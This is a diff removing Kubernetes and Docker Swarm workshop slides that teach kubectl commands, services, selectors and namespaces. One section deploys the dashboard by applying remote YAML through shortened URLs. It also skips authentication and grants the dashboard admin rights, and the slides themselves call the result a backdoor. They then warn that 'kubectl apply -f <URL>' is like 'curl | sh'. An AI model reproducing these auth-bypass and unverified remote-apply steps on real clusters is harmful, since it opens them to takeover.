*copied the spec from the first one*
|
||||
|
||||
- Therefore, we can query everybody's logs using that `run=rng` selector
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the logs of all the pods having a label `run=rng`:
|
||||
```bash
|
||||
kubectl logs -l run=rng --tail 1
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
It appears that *all the pods* are serving requests at the moment.
|
||||
|
||||
---
|
||||
|
||||
## The magic of selectors
|
||||
|
||||
- The `rng` *service* is load balancing requests to a set of pod
|
||||
|
||||
- This set of pod is defined as "pods having the label `run=rng`"
|
||||
|
||||
.exercise[
|
||||
|
||||
- Check the *selector* in the `rng` service definition:
|
||||
```bash
|
||||
kubectl describe service rng
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
When we created additional pods with this label, they were
|
||||
automatically detected by `svc/rng` and added as *endpoints*
|
||||
to the associated load balancer.
|
||||
|
||||
---
|
||||
|
||||
## Removing the first pod from the load balancer
|
||||
|
||||
- What would happen if we removed that pod, with `kubectl delete pod ...`?
|
||||
|
||||
--
|
||||
|
||||
The `replicaset` would re-create it immediately.
|
||||
|
||||
--
|
||||
|
||||
- What would happen if we removed the `run=rng` label from that pod?
|
||||
|
||||
--
|
||||
|
||||
The `replicaset` would re-create it immediately.
|
||||
|
||||
--
|
||||
|
||||
... Because what matters to the `replicaset` is the number of pods *matching that selector.*
|
||||
|
||||
--
|
||||
|
||||
- But but but ... Don't we have more than one pod with `run=rng` now?
|
||||
|
||||
--
|
||||
|
||||
The answer lies in the exact selector used by the `replicaset` ...
|
||||
|
||||
---
|
||||
|
||||
## Deep dive into selectors
|
||||
|
||||
- Let's look at the selectors for the `rng` *deployment* and the associated *replica set*
|
||||
|
||||
.exercise[
|
||||
|
||||
- Show detailed information about the `rng` deployment:
|
||||
```bash
|
||||
kubectl describe deploy rng
|
||||
```
|
||||
|
||||
- Show detailed information about the `rng` replica:
|
||||
<br/>(The second command doesn't require you to get the exact name of the replica set)
|
||||
```bash
|
||||
kubectl describe rs rng-yyyy
|
||||
kubectl describe rs -l run=rng
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
The replica set selector also has a `pod-template-hash`, unlike the pods in our daemon set.
|
||||
|
||||
---
|
||||
|
||||
# Updating a service through labels and selectors
|
||||
|
||||
- What if we want to drop the `rng` deployment from the load balancer?
|
||||
|
||||
- Option 1:
|
||||
|
||||
- destroy it
|
||||
|
||||
- Option 2:
|
||||
|
||||
- add an extra *label* to the daemon set
|
||||
|
||||
- update the service *selector* to refer to that *label*
|
||||
|
||||
--
|
||||
|
||||
Of course, option 2 offers more learning opportunities. Right?
|
||||
|
||||
---
|
||||
|
||||
## Add an extra label to the daemon set
|
||||
|
||||
- We will update the daemon set "spec"
|
||||
|
||||
- Option 1:
|
||||
|
||||
- edit the `rng.yml` file that we used earlier
|
||||
|
||||
- `kubectl apply -f rng.yml` to load the new definition
|
||||
|
||||
- Option 2:
|
||||
|
||||
- use `kubectl edit`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Use one of the two options!
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## A few possible gotchas ...
|
||||
|
||||
- There is a difference between:
|
||||
|
||||
- the label(s) of a resource (in the `metadata` block in the beginning)
|
||||
|
||||
- the selector of a resource (in the `spec` block)
|
||||
|
||||
- the label(s) of the resource(s) created by the first resource (in the `template` block)
|
||||
|
||||
- You want to update the selector and the template (at least)
|
||||
|
||||
- The template must match the selector
|
||||
|
||||
(i.e. the resource will refuse to create resources that it will not select)
|
||||
|
||||
- In YAML, `yes` should be quoted; i.e. `isactive: "yes"`
|
||||
|
||||
---
|
||||
|
||||
## Wrapping up
|
||||
|
||||
.exercise[
|
||||
|
||||
- Update the replica set selector and template label
|
||||
|
||||
- Update the service selector
|
||||
|
||||
- Check the logs of all `run=rng` pods to check that only 4 of them are now active
|
||||
|
||||
- Look at the pods that we have right now
|
||||
|
||||
- Bonus exercise 1: clean up the pods of the "old" daemon set
|
||||
|
||||
- Bonus exercise 2: how could we have done to avoid creating new pods?
|
||||
|
||||
]
|
||||
@@ -1,179 +0,0 @@
|
||||
# The Kubernetes dashboard
|
||||
|
||||
- Kubernetes resources can also be viewed with a web dashboard
|
||||
|
||||
- We are going to deploy that dashboard with *three commands:*
|
||||
|
||||
- one to actually *run* the dashboard
|
||||
|
||||
- one to make the dashboard available from outside
|
||||
|
||||
- one to bypass authentication for the dashboard
|
||||
|
||||
--
|
||||
|
||||
.footnote[.warning[Yes, this will open our cluster to all kinds of shenanigans. Don't do this at home.]]
|
||||
|
||||
---
|
||||
|
||||
## Running the dashboard
|
||||
|
||||
- We need to create a *deployment* and a *service* for the dashboard
|
||||
|
||||
- But also a *secret*, a *service account*, a *role* and a *role binding*
|
||||
|
||||
- All these things can be defined in a YAML file and created with `kubectl apply -f`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Create all the dashboard resources, with the following command:
|
||||
```bash
|
||||
kubectl apply -f https://goo.gl/Qamqab
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The goo.gl URL expands to:
|
||||
<br/>
|
||||
.small[https://raw.githubusercontent.com/kubernetes/dashboard/master/src/deploy/recommended/kubernetes-dashboard.yaml]
|
||||
|
||||
---
|
||||
|
||||
## Making the dashboard reachable from outside
|
||||
|
||||
- The dashboard is exposed through a `ClusterIP` service
|
||||
|
||||
- We need a `NodePort` service instead
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the service:
|
||||
```bash
|
||||
kubectl edit service kubernetes-dashboard
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
`NotFound`?!? Y U NO WORK?!?
|
||||
|
||||
---
|
||||
|
||||
## Editing the `kubernetes-dashboard` service
|
||||
|
||||
- If we look at the YAML that we loaded just before, we'll get a hint
|
||||
|
||||
--
|
||||
|
||||
- The dashboard was created in the `kube-system` namespace
|
||||
|
||||
.exercise[
|
||||
|
||||
- Edit the service:
|
||||
```bash
|
||||
kubectl -n kube-system edit service kubernetes-dashboard
|
||||
```
|
||||
|
||||
- Change `ClusterIP` to `NodePort`, save, and exit
|
||||
|
||||
- Check the port that was assigned with `kubectl -n kube-system get services`
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Connecting to the dashboard
|
||||
|
||||
.exercise[
|
||||
|
||||
- Connect to https://oneofournodes:3xxxx/
|
||||
|
||||
(You will have to work around the TLS certificate validation warning)
|
||||
|
||||
]
|
||||
|
||||
- We have three authentication options at this point:
|
||||
|
||||
- token (associated with a role that has appropriate permissions)
|
||||
|
||||
- kubeconfig (e.g. using the `~/.kube/config` file from `node1`)
|
||||
|
||||
- "skip" (use the dashboard "service account")
|
||||
|
||||
- Let's use "skip": we get a bunch of warnings and don't see much
|
||||
|
||||
---
|
||||
|
||||
## Granting more rights to the dashboard
|
||||
|
||||
- The dashboard documentation [explains how to do](https://github.com/kubernetes/dashboard/wiki/Access-control#admin-privileges)
|
||||
|
||||
- We just need to load another YAML file!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Grant admin privileges to the dashboard so we can see our resources:
|
||||
```bash
|
||||
kubectl apply -f https://goo.gl/CHsLTA
|
||||
```
|
||||
|
||||
- Reload the dashboard and enjoy!
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
.warning[By the way, we just added a backdoor to our Kubernetes cluster!]
|
||||
|
||||
---
|
||||
|
||||
# Security implications of `kubectl apply`
|
||||
|
||||
- When we do `kubectl apply -f <URL>`, we create arbitrary resources
|
||||
|
||||
- Resources can be evil; imagine a `deployment` that ...
|
||||
|
||||
--
|
||||
|
||||
- starts bitcoin miners on the whole cluster
|
||||
|
||||
--
|
||||
|
||||
- hides in a non-default namespace
|
||||
|
||||
--
|
||||
|
||||
- bind-mounts our nodes' filesystem
|
||||
|
||||
--
|
||||
|
||||
- inserts SSH keys in the root account (on the node)
|
||||
|
||||
--
|
||||
|
||||
- encrypts our data and ransoms it
|
||||
|
||||
--
|
||||
|
||||
- ☠️☠️☠️
|
||||
|
||||
---
|
||||
|
||||
## `kubectl apply` is the new `curl | sh`
|
||||
|
||||
- `curl | sh` is convenient
|
||||
|
||||
- It's safe if you use HTTPS URLs from trusted sources
|
||||
|
||||
--
|
||||
|
||||
- `kubectl apply -f` is convenient
|
||||
|
||||
- It's safe if you use HTTPS URLs from trusted sources
|
||||
|
||||
--
|
||||
|
||||
- It introduces new failure modes
|
||||
|
||||
- Example: the official setup instructions for most pod networks
|
||||
@@ -1,181 +0,0 @@
|
||||
chat: https://dockercommunity.slack.com/messages/C7ET1GY4Q
|
||||
|
||||
exclude:
|
||||
- self-paced
|
||||
- snap
|
||||
- auto-btp
|
||||
- benchmarking
|
||||
- elk-manual
|
||||
- prom-manual
|
||||
|
||||
chapters:
|
||||
- |
|
||||
class: title
|
||||
|
||||
.small[
|
||||
|
||||
Swarm: from Zero to Hero
|
||||
|
||||
.small[.small[
|
||||
|
||||
**Be kind to the WiFi!**
|
||||
|
||||
*Use the 5G network*
|
||||
<br/>
|
||||
*Don't use your hotspot*
|
||||
<br/>
|
||||
*Don't stream videos from YouTube, Netflix, etc.
|
||||
<br/>(if you're bored, watch local content instead)*
|
||||
|
||||
Also: share the power outlets
|
||||
<br/>
|
||||
*(with limited power comes limited responsibility?)*
|
||||
<br/>
|
||||
*(or something?)*
|
||||
|
||||
Thank you!
|
||||
|
||||
]
|
||||
]
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Intros
|
||||
|
||||
<!--
|
||||
- Hello! We are
|
||||
AJ ([@s0ulshake](https://twitter.com/s0ulshake))
|
||||
&
|
||||
Jérôme ([@jpetazzo](https://twitter.com/jpetazzo))
|
||||
-->
|
||||
|
||||
- Hello! We are Jérôme, Lee, Nicholas, and Scott
|
||||
|
||||
<!--
|
||||
I am
|
||||
Jérôme ([@jpetazzo](https://twitter.com/jpetazzo))
|
||||
-->
|
||||
|
||||
--
|
||||
|
||||
- This is our collective Docker knowledge:
|
||||
|
||||

|
||||
|
||||
---
|
||||
|
||||
## "From zero to hero"
|
||||
|
||||
--
|
||||
|
||||
- It rhymes, but it's a pretty bad title, to be honest
|
||||
|
||||
--
|
||||
|
||||
- None of you is a "zero"
|
||||
|
||||
--
|
||||
|
||||
- None of us is a "hero"
|
||||
|
||||
--
|
||||
|
||||
- None of us should even try to be a hero
|
||||
|
||||
--
|
||||
|
||||
*The hero syndrome is a phenomenon affecting people who seek heroism or recognition,
|
||||
usually by creating a desperate situation which they can resolve.
|
||||
This can include unlawful acts, such as arson.
|
||||
The phenomenon has been noted to affect civil servants,
|
||||
such as firefighters, nurses, police officers, and security guards.*
|
||||
|
||||
(Wikipedia page on [hero syndrome](https://en.wikipedia.org/wiki/Hero_syndrome))
|
||||
|
||||
---
|
||||
|
||||
## Agenda
|
||||
|
||||
.small[
|
||||
- 09:00-09:10 Hello!
|
||||
- 09:10-10:30 Part 1
|
||||
- 10:30-11:00 coffee break
|
||||
- 11:00-12:30 Part 2
|
||||
- 12:30-13:30 lunch break
|
||||
- 13:30-15:00 Part 3
|
||||
- 15:00-15:30 coffee break
|
||||
- 15:30-17:00 Part 4
|
||||
- 17:00-18:00 Afterhours and Q&A
|
||||
]
|
||||
|
||||
<!--
|
||||
- The tutorial will run from 9:00am to 12:20pm
|
||||
|
||||
- This will be fast-paced, but DON'T PANIC!
|
||||
|
||||
- There will be a coffee break at 10:30am
|
||||
<br/>
|
||||
(please remind me if I forget about it!)
|
||||
-->
|
||||
|
||||
- All the content is publicly available (slides, code samples, scripts)
|
||||
|
||||
Upstream URL: https://github.com/jpetazzo/orchestration-workshop
|
||||
|
||||
- Feel free to interrupt for questions at any time
|
||||
|
||||
- Live feedback, questions, help on [Gitter](chat)
|
||||
|
||||
http://container.training/chat
|
||||
|
||||
- intro.md
|
||||
- |
|
||||
@@TOC@@
|
||||
- - prereqs.md
|
||||
- versions.md
|
||||
- |
|
||||
class: title
|
||||
|
||||
All right!
|
||||
<br/>
|
||||
We're all set.
|
||||
<br/>
|
||||
Let's do this.
|
||||
- sampleapp.md
|
||||
- swarmkit.md
|
||||
- creatingswarm.md
|
||||
- morenodes.md
|
||||
- - firstservice.md
|
||||
- ourapponswarm.md
|
||||
- updatingservices.md
|
||||
- healthchecks.md
|
||||
- - operatingswarm.md
|
||||
- netshoot.md
|
||||
- ipsec.md
|
||||
- swarmtools.md
|
||||
- security.md
|
||||
- secrets.md
|
||||
- encryptionatrest.md
|
||||
- leastprivilege.md
|
||||
- apiscope.md
|
||||
- - logging.md
|
||||
- metrics.md
|
||||
- stateful.md
|
||||
- extratips.md
|
||||
- end.md
|
||||
- |
|
||||
class: title
|
||||
|
||||
That's all folks! <br/> Questions?
|
||||
|
||||
.small[.small[
|
||||
|
||||
Jérôme ([@jpetazzo](https://twitter.com/jpetazzo)) — [@docker](https://twitter.com/docker)
|
||||
|
||||
]]
|
||||
|
||||
<!--
|
||||
Tiffany ([@tiffanyfayj](https://twitter.com/tiffanyfayj))
|
||||
AJ ([@s0ulshake](https://twitter.com/s0ulshake))
|
||||
-->
|
||||
38
docs/end.md
38
docs/end.md
@@ -1,38 +0,0 @@
|
||||
class: title, extra-details
|
||||
|
||||
# What's next?
|
||||
|
||||
## (What to expect in future versions of this workshop)
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Implemented and stable, but out of scope
|
||||
|
||||
- [Docker Content Trust](https://docs.docker.com/engine/security/trust/content_trust/) and
|
||||
[Notary](https://github.com/docker/notary) (image signature and verification)
|
||||
|
||||
- Image security scanning (many products available, Docker Inc. and 3rd party)
|
||||
|
||||
- [Docker Cloud](https://cloud.docker.com/) and
|
||||
[Docker Datacenter](https://www.docker.com/products/docker-datacenter)
|
||||
(commercial offering with node management, secure registry, CI/CD pipelines, all the bells and whistles)
|
||||
|
||||
- Network and storage plugins
|
||||
|
||||
---
|
||||
|
||||
class: extra-details
|
||||
|
||||
## Work in progress
|
||||
|
||||
- Demo at least one volume plugin
|
||||
<br/>(bonus points if it's a distributed storage system)
|
||||
|
||||
- ..................................... (your favorite feature here)
|
||||
|
||||
Reminder: there is a tag for each iteration of the content
|
||||
in the Github repository.
|
||||
|
||||
It makes it easy to come back later and check what has changed since you did it!
|
||||
@@ -1,89 +0,0 @@
|
||||
exclude:
|
||||
- self-paced
|
||||
- snap
|
||||
|
||||
chat: "FIXME"
|
||||
|
||||
chapters:
|
||||
- |
|
||||
class: title
|
||||
|
||||
.small[
|
||||
|
||||
Deploying and scaling microservices <br/> with Docker and Kubernetes
|
||||
|
||||
.small[.small[
|
||||
|
||||
**Be kind to the WiFi!**
|
||||
|
||||
*Use the 5G network*
|
||||
<br/>
|
||||
*Don't use your hotspot*
|
||||
<br/>
|
||||
*Don't stream videos from YouTube, Netflix, etc.
|
||||
<br/>(if you're bored, watch local content instead)*
|
||||
|
||||
Thank you!
|
||||
|
||||
]
|
||||
]
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Intros
|
||||
|
||||
- Hello! I am
|
||||
Jérôme ([@jpetazzo](https://twitter.com/jpetazzo))
|
||||
|
||||
--
|
||||
|
||||
- This is my first time doing this
|
||||
|
||||
---
|
||||
|
||||
## Logistics
|
||||
|
||||
- The tutorial will run from 9:00am to 12:15pm
|
||||
|
||||
- There will be a coffee break at 10:30am
|
||||
<br/>
|
||||
(please remind me if I forget about it!)
|
||||
|
||||
- All the content is publicly available (slides, code samples, scripts)
|
||||
|
||||
Upstream URL: https://github.com/jpetazzo/orchestration-workshop
|
||||
|
||||
- Feel free to interrupt for questions at any time
|
||||
|
||||
- Live feedback, questions, help on [Gitter](chat)
|
||||
|
||||
http://container.training/chat
|
||||
|
||||
- intro.md
|
||||
- |
|
||||
@@TOC@@
|
||||
- - prereqs-k8s.md
|
||||
- versions-k8s.md
|
||||
- sampleapp.md
|
||||
- - concepts-k8s.md
|
||||
- kubectlget.md
|
||||
- setup-k8s.md
|
||||
- kubectlrun.md
|
||||
- - kubectlexpose.md
|
||||
- ourapponkube.md
|
||||
- dashboard.md
|
||||
- - kubectlscale.md
|
||||
- daemonset.md
|
||||
- rollout.md
|
||||
- whatsnext.md
|
||||
- |
|
||||
class: title
|
||||
|
||||
That's all folks! <br/> Questions?
|
||||
|
||||
.small[.small[
|
||||
|
||||
Jérôme ([@jpetazzo](https://twitter.com/jpetazzo)) — [@docker](https://twitter.com/docker)
|
||||
|
||||
]]
|
||||
@@ -1,138 +0,0 @@
|
||||
# Exposing containers
|
||||
|
||||
- `kubectl expose` creates a *service* for existing pods
|
||||
|
||||
- A *service* is a stable address for a pod (or a bunch of pods)
|
||||
|
||||
- If we want to connect to our pod(s), we need to create a *service*
|
||||
|
||||
- Once a service is created, `kube-dns` will allow us to resolve it by name
|
||||
|
||||
(i.e. after creating service `hello`, the name `hello` will resolve to something)
|
||||
|
||||
- There are different types of services, detailed on the following slides:
|
||||
|
||||
`ClusterIP`, `NodePort`, `LoadBalancer`, `ExternalName`
|
||||
|
||||
---
|
||||
|
||||
## Basic service types
|
||||
|
||||
- `ClusterIP` (default type)
|
||||
|
||||
- a virtual IP address is allocated for the service (in an internal, private range)
|
||||
- this IP address is reachable only from within the cluster (nodes and pods)
|
||||
- our code can connect to the service using the original port number
|
||||
|
||||
- `NodePort`
|
||||
|
||||
- a port is allocated for the service (by default, in the 30000-32768 range)
|
||||
- that port is made available *on all our nodes* and anybody can connect to it
|
||||
- our code must be changed to connect to that new port number
|
||||
|
||||
These service types are always available.
|
||||
|
||||
Under the hood: `kube-proxy` is using a userland proxy and a bunch of `iptables` rules.
|
||||
|
||||
---
|
||||
|
||||
## More service types
|
||||
|
||||
- `LoadBalancer`
|
||||
|
||||
- an external load balancer is allocated for the service
|
||||
- the load balancer is configured accordingly
|
||||
<br/>(e.g.: a `NodePort` service is created, and the load balancer sends traffic to that port)
|
||||
|
||||
- `ExternalName`
|
||||
|
||||
- the DNS entry managed by `kube-dns` will just be a `CNAME` to a provided record
|
||||
- no port, no IP address, no nothing else is allocated
|
||||
|
||||
The `LoadBalancer` type is currently only available on AWS, Azure, and GCE.
|
||||
|
||||
---
|
||||
|
||||
## Running containers with open ports
|
||||
|
||||
- Since `ping` doesn't have anything to connect to, we'll have to run something else
|
||||
|
||||
.exercise[
|
||||
|
||||
- Start a bunch of ElasticSearch containers:
|
||||
```bash
|
||||
kubectl run elastic --image=elasticsearch:2 --replicas=7
|
||||
```
|
||||
|
||||
- Watch them being started:
|
||||
```bash
|
||||
kubectl get pods -w
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
The `-w` option "watches" events happening on the specified resources.
|
||||
|
||||
Note: please DO NOT call the service `search`. It would collide with the TLD.
|
||||
|
||||
---
|
||||
|
||||
## Exposing our deployment
|
||||
|
||||
- We'll create a default `ClusterIP` service
|
||||
|
||||
.exercise[
|
||||
|
||||
- Expose the ElasticSearch HTTP API port:
|
||||
```bash
|
||||
kubectl expose deploy/elastic --port 9200
|
||||
```
|
||||
|
||||
- Look up which IP address was allocated:
|
||||
```bash
|
||||
kubectl get svc
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Services are layer 4 constructs
|
||||
|
||||
- You can assign IP addresses to services, but they are still *layer 4*
|
||||
|
||||
(i.e. a service is not an IP address; it's an IP address + protocol + port)
|
||||
|
||||
- This is caused by the current implementation of `kube-proxy`
|
||||
|
||||
(it relies on mechanisms that don't support layer 3)
|
||||
|
||||
- As a result: you *have to* indicate the port number for your service
|
||||
|
||||
- Running services with arbitrary port (or port ranges) requires hacks
|
||||
|
||||
(e.g. host networking mode)
|
||||
|
||||
---
|
||||
|
||||
## Testing our service
|
||||
|
||||
- We will now send a few HTTP requests to our ElasticSearch pods
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's obtain the IP address that was allocated for our service, *programatically:*
|
||||
```bash
|
||||
IP=$(kubectl get svc elastic -o go-template --template '{{ .spec.clusterIP }}')
|
||||
```
|
||||
|
||||
- Send a few requests:
|
||||
```bash
|
||||
curl http://$IP:9200/
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
Our requests are load balanced across multiple pods.
|
||||
@@ -1,234 +0,0 @@
|
||||
# First contact with `kubectl`
|
||||
|
||||
- `kubectl` is (almost) the only tool we'll need to talk to Kubernetes
|
||||
|
||||
- It is a rich CLI tool around the Kubernetes API
|
||||
|
||||
(Everything you can do with `kubectl`, you can do directly with the API)
|
||||
|
||||
- On our machines, there is a `~/.kube/config` file with:
|
||||
|
||||
- the Kubernetes API address
|
||||
|
||||
- the path to our TLS certificates used to authenticate
|
||||
|
||||
- You can also use the `--kubeconfig` flag to pass a config file
|
||||
|
||||
- Or directly `--server`, `--user`, etc.
|
||||
|
||||
- `kubectl` can be pronounced "Cube C T L", "Cube cuttle", "Cube cuddle"...
|
||||
|
||||
---
|
||||
|
||||
## `kubectl get`
|
||||
|
||||
- Let's look at our `Node` resources with `kubectl get`!
|
||||
|
||||
.exercise[
|
||||
|
||||
- Look at the composition of our cluster:
|
||||
```bash
|
||||
kubectl get node
|
||||
```
|
||||
|
||||
- These commands are equivalent:
|
||||
```bash
|
||||
kubectl get no
|
||||
kubectl get node
|
||||
kubectl get nodes
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## From human-readable to machine-readable output
|
||||
|
||||
- `kubectl get` can output JSON, YAML, or be directly formatted
|
||||
|
||||
.exercise[
|
||||
|
||||
- Give us more info about them nodes:
|
||||
```bash
|
||||
kubectl get nodes -o wide
|
||||
```
|
||||
|
||||
- Let's have some YAML:
|
||||
```bash
|
||||
kubectl get no -o yaml
|
||||
```
|
||||
See that `kind: List` at the end? It's the type of our result!
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## (Ab)using `kubectl` and `jq`
|
||||
|
||||
- It's super easy to build custom reports
|
||||
|
||||
.exercise[
|
||||
|
||||
- Show the capacity of all our nodes as a stream of JSON objects:
|
||||
```bash
|
||||
kubectl get nodes -o json |
|
||||
jq ".items[] | {name:.metadata.name} + .status.capacity"
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## What's available?
|
||||
|
||||
- `kubectl` has pretty good introspection facilities
|
||||
|
||||
- We can list all available resource types by running `kubectl get`
|
||||
|
||||
- We can view details about a resource with:
|
||||
```bash
|
||||
kubectl describe type/name
|
||||
kubectl describe type name
|
||||
```
|
||||
|
||||
- We can view the definition for a resource type with:
|
||||
```bash
|
||||
kubectl explain type
|
||||
```
|
||||
|
||||
Each time, `type` can be singular, plural, or abbreviated type name.
|
||||
|
||||
---
|
||||
|
||||
## Services
|
||||
|
||||
- A *service* is a stable endpoint to connect to "something"
|
||||
|
||||
(In the initial proposal, they were called "portals")
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the services on our cluster with one of these commands:
|
||||
```bash
|
||||
kubectl get services
|
||||
kubectl get svc
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
There is already one service on our cluster: the Kubernetes API itself.
|
||||
|
||||
---
|
||||
|
||||
## ClusterIP services
|
||||
|
||||
- A `ClusterIP` service is internal, available from the cluster only
|
||||
|
||||
- This is useful for introspection from within containers
|
||||
|
||||
.exercise[
|
||||
|
||||
- Try to connect to the API:
|
||||
```bash
|
||||
curl -k https://`10.96.0.1`
|
||||
```
|
||||
|
||||
- `-k` is used to skip certificate verification
|
||||
- Make sure to replace 10.96.0.1 with the CLUSTER-IP shown earlier
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
The error that we see is expected: the Kubernetes API requires authentication.
|
||||
|
||||
---
|
||||
|
||||
## Listing running containers
|
||||
|
||||
- Containers are manipulated through *pods*
|
||||
|
||||
- A pod is a group of containers:
|
||||
|
||||
- running together (on the same node)
|
||||
|
||||
- sharing resources (RAM, CPU; but also network, volumes)
|
||||
|
||||
.exercise[
|
||||
|
||||
- List pods on our cluster:
|
||||
```bash
|
||||
kubectl get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
*These are not the pods you're looking for.* But where are they?!?
|
||||
|
||||
---
|
||||
|
||||
## Namespaces
|
||||
|
||||
- Namespaces allow to segregate resources
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the namespaces on our cluster with one of these commands:
|
||||
```bash
|
||||
kubectl get namespaces
|
||||
kubectl get namespace
|
||||
kubectl get ns
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
*You know what ... This `kube-system` thing looks suspicious.*
|
||||
|
||||
---
|
||||
|
||||
## Accessing namespaces
|
||||
|
||||
- By default, `kubectl` uses the `default` namespace
|
||||
|
||||
- We can switch to a different namespace with the `-n` option
|
||||
|
||||
.exercise[
|
||||
|
||||
- List the pods in the `kube-system` namespace:
|
||||
```bash
|
||||
kubectl -n kube-system get pods
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
*Ding ding ding ding ding!*
|
||||
|
||||
---
|
||||
|
||||
## What are all these pods?
|
||||
|
||||
- `etcd` is our etcd server
|
||||
|
||||
- `kube-apiserver` is the API server
|
||||
|
||||
- `kube-controller-manager` and `kube-scheduler` are other master components
|
||||
|
||||
- `kube-dns` is an additional component (not mandatory but super useful, so it's there)
|
||||
|
||||
- `kube-proxy` is the (per-node) component managing port mappings and such
|
||||
|
||||
- `weave` is the (per-node) component managing the network overlay
|
||||
|
||||
- the `READY` column indicates the number of containers in each pod
|
||||
|
||||
- the pods with a name ending with `-ip-172-31-XX-YY` are the master components
|
||||
<br/>
|
||||
(they have been specifically "pinned" to the master node)
|
||||
@@ -1,197 +0,0 @@
|
||||
# Running our first containers on Kubernetes
|
||||
|
||||
- First things first: we cannot run a container
|
||||
|
||||
--
|
||||
|
||||
- We are going to run a pod, and in that pod there will be a single container
|
||||
|
||||
--
|
||||
|
||||
- In that container in the pod, we are going to run a simple `ping` command
|
||||
|
||||
- Then we are going to start additional copies of the pod
|
||||
|
||||
---
|
||||
|
||||
## Starting a simple pod with `kubectl run`
|
||||
|
||||
- We need to specify at least a *name* and the image we want to use
|
||||
|
||||
.exercise[
|
||||
|
||||
- Let's ping `goo.gl`:
|
||||
```bash
|
||||
kubectl run pingpong --image alpine ping goo.gl
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
OK, what did just happen?
|
||||
|
||||
---
|
||||
|
||||
## Behind the scenes of `kubectl run`
|
||||
|
||||
- Let's look at the resources that were created by `kubectl run`
|
||||
|
||||
.exercise[
|
||||
|
||||
- List most resource types:
|
||||
```bash
|
||||
kubectl get all
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
--
|
||||
|
||||
We should see the following things:
|
||||
- `deploy/pingpong` (the *deployment* that we just created)
|
||||
- `rs/pingpong-xxxx` (a *replica set* created by the deployment)
|
||||
- `po/pingpong-yyyy` (a *pod* created by the replica set)
|
||||
|
||||
---
|
||||
|
||||
## Deployments, replica sets, and replication controllers
|
||||
|
||||
- A *deployment* is a high-level construct
|
||||
|
||||
- allows scaling, rolling updates, rollbacks
|
||||
|
||||
- multiple deployments can be used together to implement a
|
||||
[canary deployment](https://kubernetes.io/docs/concepts/cluster-administration/manage-deployment/#canary-deployments)
|
||||
|
||||
- delegates pods management to *replica sets*
|
||||
|
||||
- A *replica set* is a low-level construct
|
||||
|
||||
- makes sure that a given number of identical pods are running
|
||||
|
||||
- allows scaling
|
||||
|
||||
- rarely used directly
|
||||
|
||||
- A *replication controller* is the (deprecated) predecessor of a replica set
|
||||
|
||||
---
|
||||
|
||||
## Our `pingpong` deployment
|
||||
|
||||
- `kubectl run` created a *deployment*, `deploy/pingpong`
|
||||
|
||||
- That deployment created a *replica set*, `rs/pingpong-xxxx`
|
||||
|
||||
- That replica set created a *pod*, `po/pingpong-yyyy`
|
||||
|
||||
- We'll see later how these folks play together for:
|
||||
|
||||
- scaling
|
||||
|
||||
- high availability
|
||||
|
||||
- rolling updates
|
||||
|
||||
---
|
||||
|
||||
## Viewing container output
|
||||
|
||||
- Let's use the `kubectl logs` command
|
||||
|
||||
- We will pass either a *pod name*, or a *type/name*
|
||||
|
||||
(E.g. if we specify a deployment or replica set, it will get the first pod in it)
|
||||
|
||||
- Unless specified otherwise, it will only show logs of the first container in the pod
|
||||
|
||||
(Good thing there's only one in ours!)
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the result of our `ping` command:
|
||||
```bash
|
||||
kubectl logs deploy/pingpong
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Streaming logs in real time
|
||||
|
||||
- Just like `docker logs`, `kubectl logs` supports convenient options:
|
||||
|
||||
- `-f`/`--follow` to stream logs in real time (à la `tail -f`)
|
||||
|
||||
- `--tail` to indicate how many lines you want to see (from the end)
|
||||
|
||||
- `--since` to get logs only after a given timestamp
|
||||
|
||||
.exercise[
|
||||
|
||||
- View the latest logs of our `ping` command:
|
||||
```bash
|
||||
kubectl logs deploy/pingpong --tail 1 --follow
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
---
|
||||
|
||||
## Scaling our application
|
||||
|
||||
- We can create additional copies of our container (I mean, our pod) with `kubectl scale`
|
||||
|
||||
.exercise[
|
||||
|
||||
- Scale our `pingpong` deployment:
|
||||
```bash
|
||||
kubectl scale deploy/pingpong --replicas 8
|
||||
```
|
||||
|
||||
]
|
||||
|
||||
Note: what if we tried to scale `rs/pingpong-xxxx`?
|
||||
|
||||
We could! But the *deployment* would notice it right away, and scale back to the initial level.
|
||||
|
||||
---
|
||||
|
||||
## Viewing logs of multiple pods
|
||||
|
||||
- When we specify a deployment name, only one single pod's logs are shown
|
||||
|
||||
